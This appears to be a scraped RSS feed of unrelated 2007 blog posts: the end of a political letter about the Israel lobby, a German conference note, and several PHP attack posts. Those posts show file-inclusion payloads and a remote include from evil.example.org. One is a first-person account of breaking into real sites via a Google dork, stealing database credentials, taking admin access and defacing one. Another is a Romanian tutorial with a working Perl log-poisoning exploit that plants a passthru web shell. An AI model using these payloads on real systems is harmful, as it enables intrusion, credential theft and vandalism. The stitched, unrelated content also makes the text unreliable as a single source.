<p>Doron Almog, an Israeli ex-general also involved in the Shehadeh affair, narrowly avoided arrest when he landed at Heathrow in 2005. Now Israel wishes the UK to change its laws to protect alleged war criminals. How can we be sure this will not happen in the name of “enhanced co-operation”, as Mr Howells puts it.</p>
<p>Given that Israel’s deep penetration of our political system apparently prevents Britain from taking a principled stand on Middle East matters, including the violations of Palestinian human rights, we invite your Committee – minus those with an interest – to uphold the Principles of Public Life and consider the activities of the Friends of Israel as a matter for urgent investigation.</p>
<p>For truth and justice,</p>
<p>(Signatories)</p>
<p>Mona Baker, Professor of Translation Studies, BA, MA, DSc</p>
<p>Sally FitzHarris, MA (Oxon)</p>
<p>Karl Sabbagh, writer</p>
<p>Sara T A Wood, MA (Oxon)</p>
<p>Derek Summerfield, Hon Senior Lecturer, Institute of Psychiatry, King's College and Teaching Associate, Refugee Studies Centre, University of Oxford</p>
<p>David Halpin, MB, BSc, FRCS,</p>
<p>Stuart Littlewood, BA, MInstM</p>
<p>Martin Birnstingl, MS FRCS, previously senior surgeon at St Bartholomew's Hospital, London</p>
<p>Felicity Arbuthnot</p>
<p>Rich Wiles, Artist</p>
<p>Dr.C.J.Burns-Cox, MD, FRCP</p>
<p>Dr Nur Masalha, Reader in Religion and Politics and Editor of Holy Land Studies: A Multidisciplinary Journal</p>
<p>David Seddon, MA PhD</p>
<p>Robert Shearer, MB BS FRCS, Consultant Urological Surgeon (retd)</p>
<p>Medical Director, Royal Marsden Hospital, London 1994-2000.</p>
<p>James Goddard, MBE and Tricia Goddard</p>
<p>Sue Fanous, BSc, MA</p>
<p>Colin Imber, formerly Reader in Turkish Studies, University of Manchester</p>
<p>Mary Bedforth</p>
<p>(Ed. Note. Addresses in the original have been deleted for obvious reasons.)</p>
<p><b>Essential information for the Committee….</b></p>
<p><b>PCHR Weekly Report: Israeli Human Rights Violations</b><br />
<a href="http://www.pchrgaza.org/files/W_report/English/2007/13-12-2007.htm">http://www.pchrgaza.org/files/W_report/English/2007/13-12-2007.htm</a></p>
<p><b>Walt &#38; Mearsheimer: The Israel Lobby</b><br />
<a href="http://www.lrb.co.uk/v28/n06/mear01_.html">http://www.lrb.co.uk/v28/n06/mear01_.html</a></p>
<p><b>John Pilger </b><br />
<a href="http://www.informationclearinghouse.info/article18904.htm">http://www.informationclearinghouse.info/article18904.htm</a></p>
<p><b>USA’s Israel Lobby</b> <a href="http://www.redress.cc/global/pjballes20070917">http://www.redress.cc:80/global/pjballes20070917</a></p>
<p><b>Jeff Halper: Israel’s Strategy for Permanent Occupation</b><br />
<a href="http://www.counterpunch.org/halper11272007.html">http://www.counterpunch.org/halper11272007.html</a></p>
<p><b>Privatising Zionism</b><br />
<a href="http://www.zmag.org/content/showarticle.cfm?SectionID=107&#38;ItemID=14510">http://www.zmag.org:80/content/showarticle.cfm?SectionID=107&#38;ItemID=14510</a></p>
<p><b>Uri Avnery: Talk with Hamas Now</b><br />
<a href="http://www.redress.cc/palestine/uavnery20060129">http://www.redress.cc/palestine/uavnery20060129</a></p>
<p><b>Facts about the Founding Fathers of Israel</b><br />
<a href="http://www.redress.cc/palestine/skabbani20040424">http://www.redress.cc/palestine/skabbani20040424</a></p>
<p><b>40 Years of House Demolitions</b><br />
<a href="http://www.icahd.org/eng/news.asp?menu=5&#38;submenu=1&#38;item=488">http://www.icahd.org/eng/news.asp?menu=5&#38;submenu=1&#38;item=488</a></p>
<p><b>Gaza: A Call for Urgent Action</b><br />
<a href="http://www.icahd.org/eng/news.asp?menu=5&#38;submenu=1&#38;item=483">http://www.icahd.org/eng/news.asp?menu=5&#38;submenu=1&#38;item=483</a></p>
<p><b>Not Only Territory but Viability</b><br />
<a href="http://www.icahd.org/eng/news.asp?menu=5&#38;submenu=1&#38;item=480">http://www.icahd.org/eng/news.asp?menu=5&#38;submenu=1&#38;item=480</a></p>
<p><b>Matrix of Control</b><br />
<a href="http://www.merip.org/mer/mer216/216_halper.html">http://www.merip.org/mer/mer216/216_halper.html</a></p>
<p><b>Torment and Torture</b> <a href="http://www.redress.cc/palestine/dhalpin20071211">http://www.redress.cc/palestine/dhalpin20071211</a></p>
<p><b>Finally, a quiz to test the knowledge of any Friend of Israel on the Refugee issue</b><br />
<a href="http://www.personal.leeds.ac.uk/%7Eeenajma/PalQuiz/quiz1/quizmaker.html">http://www.personal.leeds.ac.uk:80/~eenajma/PalQuiz/quiz1/quizmaker.html</a></p>
<p>Lest we forget…..</p>
<p><b>The Seven Principles of Public Life</b><br />
The Committee has set out ‘Seven Principles of Public Life’ which it believes should apply to all in the public service. These are:</p>
<p><b>Selflessness</b><br />
Holders of public office should act solely in terms of the public interest. They should not do so in order to gain financial or other benefits for themselves, their family or their friends.</p>
<p><b>Integrity </b><br />
Holders of public office should not place themselves under any financial or other obligation to outside individuals or organisations that might seek to influence them in the performance of their official duties.</p>
<p><b>Objectivity</b><br />
In carrying out public business, including making public appointments, awarding contracts, or recommending individuals for rewards and benefits, holders of public office should make choices on merit.</p>
<p><b>Accountability</b><br />
Holders of public office are accountable for their decisions and actions to the public and must submit themselves to whatever scrutiny is appropriate to their office.</p>
<p><b>Openness</b><br />
Holders of public office should be as open as possible about all the decisions and actions that they take. They should give reasons for their decisions and restrict information only when the wider public interest clearly demands.</p>
<p><b>Honesty</b><br />
Holders of public office have a duty to declare any private interests relating to their public duties and to take steps to resolve any conflicts arising in a way that protects the public interest.</p>
<p><b>Leadership</b><br />
Holders of public office should promote and support these principles by leadership and example.</p></blockquote>
]]></content:encoded>
</item>
<item>
<title><![CDATA[The null byte to hack includes]]></title>
<link>http://phpsecurity.wordpress.com/2007/12/09/the-null-byte-to-hack-includes/</link>
<pubDate>Sun, 09 Dec 2007 19:43:19 +0000</pubDate>
<dc:creator>b23</dc:creator>
<guid>http://phpsecurity.wordpress.com/2007/12/09/the-null-byte-to-hack-includes/</guid>
<description><![CDATA[The null byte (also null terminator) is a character with the value zero, present in the ASCII and Un]]></description>
<content:encoded><![CDATA[<p>The null byte (also null terminator) is a character with the value zero, present in the ASCII and Unicode character sets. Strings end if there is a null character.<br />
In PHP this character looks like this %00.</p>
<p>Ok whats the deal with null bytes?</p>
<p>A lot of people think that this method below, to include a file which has a fix extension (.php), is a bullet prof one, but that's not true.</p>
<div style="border:1px dashed rgb(140, 172, 187);overflow:auto;background-color:rgb(247, 249, 250);color:rgb(101, 101, 101);font-size:12px;margin-bottom:10px;padding:1em 1em 10px;">&#60;?php<br />
    include ($_GET['site'].".php");<br />
?&#62;
</div>
<p>If you call the script with a null byte in the URL it's possible to include any local or remote site!</p>
<p>http://example.com/?site=../../../../etc/passwd%00</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Erfahrungsbericht LiOn]]></title>
<link>http://mistapostel.wordpress.com/2007/12/04/erfahrungsbericht-lion/</link>
<pubDate>Tue, 04 Dec 2007 09:15:02 +0000</pubDate>
<dc:creator>markus.mauracher</dc:creator>
<guid>http://mistapostel.wordpress.com/2007/12/04/erfahrungsbericht-lion/</guid>
<description><![CDATA[Am 28.11. fand in Innsbruck die Bilddungsklausur des LFI Tirol statt.
10-minütige Impulsreferate au]]></description>
<content:encoded><![CDATA[<p><span style="font-family:Arial;">Am 28.11. fand in Innsbruck die Bilddungsklausur des LFI Tirol statt.<br />
10-minütige Impulsreferate aus den acht Bereichen sorgten für einen guten Einstieg. Vorwiegend "LFI-fremde" Referent/innen wurden eingesetzt. Diese Tatsache bedingt eine geringe Anreisezeit der Referent/innen bei physischer Anwesenheit.</span><span style="font-family:Arial;">Aufgrund dieser Voraussetzungen und des Themas des Impulsreferates aus dem Bereich ITK "Neue Kommunikationsmöglichkeiten", lag es nahe unsere Referentin Martina Weinzettl aus dem LFI Steiermark über unseren Live-Online-Raum (LiOn) referieren zu lassen.<br />
Vor Ort technisch gut ausgestattet, Laptop über WLAN mit dem Internet verbunden und externe Lautsprecher samt separatem Mikrofon, referierte Martina ca. 12 Minuten aus der Steiermark über neue Kommunikationsmöglichkeiten.</span><span style="font-family:Arial;">Die Anwesenden blickten gespannt auf die Beamerprojektion und lauschten interessiert der Stimme aus den Boxen.</span></p>
<p><span style="font-family:Arial;"></span><span style="font-family:Arial;"><strong>Resümee<br />
</strong></span><span style="font-family:Arial;">Gewöhnungsbedürftig war die Art des Vortrages ohne sichtbare Person. Dem Wunsch, nach einem Bild zu der Stimme, konnte über die Homepage nachgekommen werden.<br />
Bei zukünftigen Präsentationen über den LiOn vor unbekanntem Publikum, würde ein Bild der/des Referent/in zu Beginn der Präsentation sicherlich nicht schaden.</span><span style="font-family:Arial;">Nach 5 bis 10 Minuten Vortrag sollte der/die anwesende Moderator/in in Erscheinung treten. Es ist wichtig dem/der Referenten/in Feedback über die Stimmung zu geben. Dem Publikum wird Abwechslung geboten und durch eine aktive Aufforderung des Moderators, z.B. Fragen abklären, diskutieren etc., wird das Publikum aktiv in das Referat eingebunden.</span></p>
<p><span style="font-family:Arial;"></span><span style="font-family:Arial;">Zwei wesentliche Aspekte konnte dieses Impulsreferat abdecken.<br />
</span><span style="font-family:Arial;">Fachinformationen wurden ohne physische Präsenz der kompetenten Person vorgetragen. Für diesen Input wäre eine Reise aus der Steiermark nicht gerechtfertigt. Über LiOn war es möglich.<br />
</span><span style="font-family:Arial;">Die technische Möglichkeit konnte anhand dieses praktischen Beispiels demonstriert werden. Es handelte sich dabei um kein inszeniertes Beispiel.</span></p>
<p><span style="font-family:Arial;"></span><span style="font-family:Arial;">Herzlichen Dank an Martina Weinzettl!</span></p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[(evil) Register Globals (on)]]></title>
<link>http://phpsecurity.wordpress.com/2007/11/07/evil-register-globals-on/</link>
<pubDate>Wed, 07 Nov 2007 22:45:03 +0000</pubDate>
<dc:creator>b23</dc:creator>
<guid>http://phpsecurity.wordpress.com/2007/11/07/evil-register-globals-on/</guid>
<description><![CDATA[The register_globals directive is disabled (register_globals = Off) by default in PHP versions 4.2.0]]></description>
<content:encoded><![CDATA[<p>The register_globals directive is disabled (register_globals = Off) by default in PHP versions 4.2.0 and greater in the php config (php.ini). While it doesn't represent a security vulnerability, it's a security risk. </p>
<p>Why is it a security risk? Let's look at this example:</p>
<p><!--more--></p>
<div style="border:1px dashed rgb(140, 172, 187);overflow:auto;background-color:rgb(247, 249, 250);color:rgb(101, 101, 101);font-size:12px;padding:0.5em;">&#60;?php </p>
<p>if (login_user())<br />
{<br />
&#160;&#160;&#160;&#160;$login = true;<br />
} </p>
<p>if ($login)<br />
{<br />
&#160;&#160;&#160;&#160;include '/highly/sensitive/data.php';<br />
}<br />
?&#62;</p></div>
<p>With register_globals enabled (register_globals = On), this page can be requested with ?login=1 in the query string to bypass the intended access control.<br />
Of course, this particular vulnerability is the fault of the developer, not register_globals, but this indicates the increased risk posed by the directive. Without it, ordinary global variables (such as $login in the example) are not affected by data submitted by the client. </p>
<p>Another example that illustrates how register_globals can be problematic is the following use of include with a dynamic path:</p>
<div style="border:1px dashed rgb(140, 172, 187);overflow:auto;background-color:rgb(247, 249, 250);color:rgb(101, 101, 101);font-size:12px;padding:0.5em;">&#60;?php<br />
&#160;&#160;&#160;&#160;include "$path";<br />
?&#62;</div>
<p>With register_globals enabled, this page can be requested with ?path=http://evil.example.org/evilscript in the query string in order to equate this example to the following:</p>
<p>include 'http://evil.example.org/evilscript';</p>
<p>If allow_url_fopen is enabled (which is by default), this will include the output of http://evil.example.org/evilscript just as if it were a local file. This is a major security vulnerability called remote file inclusion (RFI), and it's one that has been discovered in many popular open source applications.</p>
<p>It's also possible that someone reads local files with the example above (LFI = local file inclusion). A requested page with ?page=../../../../etc/passwd in the query string and it will show you on Unix-based systems the password file.</p>
<p><img src='http://phpsecurity.wordpress.com/files/2007/11/lfi.png' alt='local file inclusion' /></p>
<p>I think register_globals must be disabled and every programmer must take care of the global spacing from php.<br />
The best way is to initialize all variables and to develop with <a href="http://at.php.net/manual/en/function.error-reporting.php">error_reporting</a> set to E_ALL, so that the use of an uninitialized variable<br />
won't be overlooked during development.</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Another random LFI]]></title>
<link>http://websecure.wordpress.com/2007/10/21/3/</link>
<pubDate>Sun, 21 Oct 2007 23:26:46 +0000</pubDate>
<dc:creator>websecure</dc:creator>
<guid>http://websecure.wordpress.com/2007/10/21/3/</guid>
<description><![CDATA[
// Script Title: eLouai&#8217;s Force Download
// Home Script: http://elouai.com/force-download.php]]></description>
<content:encoded><![CDATA[<p><font face="verdana" size="1"><br />
// Script Title: eLouai's Force Download<br />
// Home Script: http://elouai.com/force-download.php<br />
// Vuln Type: Local File Inclusion / LFI<br />
// Discovered by: The_PitBull aNd iNs<br />
// Bug:<br />
$filename = $_GET['file'];<br />
// PoC: http://www.site.com/force-download.php?file=[LFI]<br />
// D0rk: allinurl: force-download।php?file=</p>
<p>So i first looked at the google dork. Seems ok, but i preferred to change it a little bit to:</font><br />
allinurl:force-download.php.file=</p>
<p>And i started to play around with it.<br />
Started my firefox turned on hackbar view on, took the first result in google (i never do this, but this time i was high a bit) and started to test the site.<br />
I saw that i can include the index.php file like this</p>
<p>http://vulnerabile.site/force-download.php?file=index.php</p>
<p>And i could download the file. Wow! This is nice. What does this actually mean ?<br />
That the file is not included in the script, and the headers were similar to this:</p>
<p>Content-Disposition: attachment; filename=index.php</p>
<p>Hmm, i cannot use log poisoning and including... damn.<br />
I'm looking around though the files and i'm trying to see all the saved passwords and information that could help me.<br />
Interesting files like: config.php, config.inc.php, db.php.<br />
I can see mysql passwords, smtp servers, everything.<br />
I'm getting bored with this site and i go looking for another one.</p>
<p>I finally find an interesting site. I see that the /admin directory exists and automatically redirects me to login.php.<br />
I'm thinking, are they stupid enough to put the password in plain text ? A few seconds and... yes they are.<br />
Hello, i have admin over the whole site. Cool!</p>
<p>No defacement. I don't like full defacements. Only a few scary clowns pictures added.</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[LFI [Local File Inclusion]]]></title>
<link>http://vladii.wordpress.com/2007/08/24/lfi-local-file-inclusion/</link>
<pubDate>Fri, 24 Aug 2007 10:15:12 +0000</pubDate>
<dc:creator>vladii</dc:creator>
<guid>http://vladii.wordpress.com/2007/08/24/lfi-local-file-inclusion/</guid>
<description><![CDATA[Buna ziua! In acest tutorial o sa invatati cum cum sa exploatati vulnerabilitatea LFI dintr-un site.]]></description>
<content:encoded><![CDATA[<p><span class="postbody">Buna ziua! In acest tutorial o sa invatati cum cum sa exploatati vulnerabilitatea LFI dintr-un site.</span></p>
<p>Mai intai, sa vedem acest mic cod php:</p>
<table align="center" border="0" cellpadding="3" cellspacing="1" width="90%">
<tr>
<td><span class="genmed"><strong>Cod:</strong></span></td>
</tr>
<tr>
<td class="code">&#60;?php<br />
$page = $_GET[page];<br />
include($page);<br />
?&#62;</td>
</tr>
</table>
<p><span class="postbody"></span></p>
<p>Acesta este un cod care nu ar trebui folosit niciodata, vulnerabil la LFI, pentru ca variabila $page nu este santinizata.</p>
<p>Ok, acum sa profitam de aceasta vulnerabilitate, folosind urmatorul cod:</p>
<table align="center" border="0" cellpadding="3" cellspacing="1" width="90%">
<tr>
<td><span class="genmed"><strong>Cod:</strong></span></td>
</tr>
<tr>
<td class="code">site.host/index.php?page=../../../../../../../etc/passwd</td>
</tr>
</table>
<p><span class="postbody"><br />
Daca siteul este gazduit Unix, parolele userilor sunt stocate in /etc/passwd si codul de mai sus ne arata aceste parole si usernameurile. Acum tot ce mai ai de facut este sa decodezi parola.<br />
O parola criptata, ar trebui sa arate cam asa:<br />
</span></p>
<table align="center" border="0" cellpadding="3" cellspacing="1" width="90%">
<tr>
<td><span class="genmed"><strong>Cod:</strong></span></td>
</tr>
<tr>
<td class="code">username:x:503:100:FullName:/home/username:/bin/sh</td>
</tr>
</table>
<p><span class="postbody"><br />
In acest exemplu, parola este x, alt exemplu de parola fiind:<br />
</span></p>
<table align="center" border="0" cellpadding="3" cellspacing="1" width="90%">
<tr>
<td><span class="genmed"><strong>Cod:</strong></span></td>
</tr>
<tr>
<td class="code">username:!:503:100:FullName:/home/username:/bin/sh</td>
</tr>
</table>
<p><span class="postbody"><br />
Alte "locuri" unde puteti gasi parolele in afara de /etc/passwd ar cam fi:<br />
</span></p>
<table align="center" border="0" cellpadding="3" cellspacing="1" width="90%">
<tr>
<td><span class="genmed"><strong>Cod:</strong></span></td>
</tr>
<tr>
<td class="code">/etc/shadow<br />
/etc/group<br />
/etc/security/group<br />
/etc/security/passwd<br />
/etc/security/user<br />
/etc/security/environ<br />
/etc/security/limits</td>
</tr>
</table>
<p><span class="postbody"><br />
In caz ca Browserul va arata la sfarsitul includerii un .php (si automat. /etc/passwd.php nu va mai exista), adaugati la sf includerii %00, serverul va omite tot ce scrie dupa %00.<br />
Exemplu de cod:<br />
</span></p>
<table align="center" border="0" cellpadding="3" cellspacing="1" width="90%">
<tr>
<td><span class="genmed"><strong>Cod:</strong></span></td>
</tr>
<tr>
<td class="code">site.host/index.php?file=../../../../../../../../etc/passwd%00</td>
</tr>
</table>
<p><span class="postbody"></span></p>
<p>Acum vom incerca sa rulam comenzi pe server injectand coduri php in loguri, apoi rulandu-le.<br />
Cateva adrese de loguri:</p>
<table align="center" border="0" cellpadding="3" cellspacing="1" width="90%">
<tr>
<td><span class="genmed"><strong>Cod:</strong></span></td>
</tr>
<tr>
<td class="code">../apache/logs/error.log<br />
../apache/logs/access.log<br />
../../apache/logs/error.log<br />
../../apache/logs/access.log<br />
../../../apache/logs/error.log<br />
../../../apache/logs/access.log<br />
../../../../../../../etc/httpd/logs/acces_log<br />
../../../../../../../etc/httpd/logs/acces.log<br />
../../../../../../../etc/httpd/logs/error_log<br />
../../../../../../../etc/httpd/logs/error.log<br />
../../../../../../../var/www/logs/access_log<br />
../../../../../../../var/www/logs/access.log<br />
../../../../../../../usr/local/apache/logs/access_log<br />
../../../../../../../usr/local/apache/logs/access.log<br />
../../../../../../../var/log/apache/access_log<br />
../../../../../../../var/log/apache2/access_log<br />
../../../../../../../var/log/apache/access.log<br />
../../../../../../../var/log/apache2/access.log<br />
../../../../../../../var/log/access_log<br />
../../../../../../../var/log/access.log<br />
../../../../../../../var/www/logs/error_log<br />
../../../../../../../var/www/logs/error.log<br />
../../../../../../../usr/local/apache/logs/error_log<br />
../../../../../../../usr/local/apache/logs/error.log<br />
../../../../../../../var/log/apache/error_log<br />
../../../../../../../var/log/apache2/error_log<br />
../../../../../../../var/log/apache/error.log<br />
../../../../../../../var/log/apache2/error.log<br />
../../../../../../../var/log/error_log<br />
../../../../../../../var/log/error.log</td>
</tr>
</table>
<p><span class="postbody"><br />
Ok, acum sa aruncam o privire asupra logului in care se salveaza paginile care nu exista si urmatorul cod: &#60;? passthru(\$_GET[cmd]) ?&#62;. Daca scriem in browser:<br />
</span></p>
<table align="center" border="0" cellpadding="3" cellspacing="1" width="90%">
<tr>
<td><span class="genmed"><strong>Cod:</strong></span></td>
</tr>
<tr>
<td class="code">site.host/&#60;? passthru(\$_GET[cmd]) ?&#62;</td>
</tr>
</table>
<p><span class="postbody"><br />
O sa ne arate evident o pagina in care scrie ca acest cod nu exista pe server, deoarece browserul encodeaza automat URL'ul si pagina pe care noi am accesat-o, browserul o traduce in:<br />
</span></p>
<table align="center" border="0" cellpadding="3" cellspacing="1" width="90%">
<tr>
<td><span class="genmed"><strong>Cod:</strong></span></td>
</tr>
<tr>
<td class="code">site.host/%3C?%20passthru(\$_GET[cmd])%20?&#62;</td>
</tr>
</table>
<p><span class="postbody"><br />
Deci va trebui sa facem altceva... Putem utiliza urmatorul script perl:<br />
</span></p>
<table align="center" border="0" cellpadding="3" cellspacing="1" width="90%">
<tr>
<td><span class="genmed"><strong>Cod:</strong></span></td>
</tr>
<tr>
<td class="code">#!/usr/bin/perl -w<br />
use IO::Socket;<br />
use LWP::UserAgent;<br />
$site="victim.com";<br />
$path="/folder/";<br />
$code="&#60;? passthru(\$_GET[cmd]) ?&#62;";<br />
$log = "../../../../../../../etc/httpd/logs/error_log";print "Trying to inject the code";</p>
<p>$socket = IO::Socket::INET-&#62;new(Proto=&#62;"tcp", PeerAddr=&#62;"$site", PeerPort=&#62;"80") or die "\nConnection Failed.\n\n";<br />
print $socket "GET ".$path.$code." HTTP/1.1\r\n";<br />
print $socket "User-Agent: ".$code."\r\n";<br />
print $socket "Host: ".$site."\r\n";<br />
print $socket "Connection: close\r\n\r\n";<br />
close($socket);<br />
print "\nCode $code sucssefully injected in $log \n";</p>
<p>print "\nType command to run or exit to end: ";<br />
$cmd = &#60;STDIN&#62;;</p>
<p>while($cmd !~ "exit") {</p>
<p>$socket = IO::Socket::INET-&#62;new(Proto=&#62;"tcp", PeerAddr=&#62;"$site", PeerPort=&#62;"80") or die "\nConnection Failed.\n\n";<br />
print $socket "GET ".$path."index.php=".$log."&#38;cmd=$cmd HTTP/1.1\r\n";<br />
print $socket "Host: ".$site."\r\n";<br />
print $socket "Accept: */*\r\n";<br />
print $socket "Connection: close\r\n\n";</p>
<p>while ($show = &#60;$socket&#62;)<br />
{<br />
print $show;<br />
}</p>
<p>print "Type command to run or exit to end: ";<br />
$cmd = &#60;STDIN&#62;;<br />
}</td>
</tr>
</table>
<p><span class="postbody"><br />
Copy/Paste la chestia asta si salveaz-o ca ex.pl, dar nu uita sa modifici in exploit urmatoarele lucruri:<br />
1) modifica numele siteului<br />
2) modifica numele logului si calea catre el<br />
3) schimba index.php= cu ce doresti tu</span></p>
<p>Rulati scriptul si el va va intreba ce comenzi sa rulati !!! Va descurcati de aici incolo !!!</p>
<p>Linkuri utile:</p>
<table align="center" border="0" cellpadding="3" cellspacing="1" width="90%">
<tr>
<td><span class="genmed"><strong>Cod:</strong></span></td>
</tr>
<tr>
<td class="code">http://www.milw0rm.com/video/watch.php?id=57</td>
</tr>
</table>
<p><span class="postbody"><br />
Acesta este un mic tutorial video, incercati sa-l vizionati ca este foarte bun.</span></p>
<p>Proof of Concept:<br />
[img]<br />
<a href="http://img355.imageshack.us/my.php?image=sitewe2.jpg" target="_blank">http://img355.imageshack.us/my.php?image=sitewe2.jpg</a><br />
[/img]</p>
<p>Traducerea si adaptarea+modificari: vladiii</p>
]]></content:encoded>
</item>

</channel>
</rss>
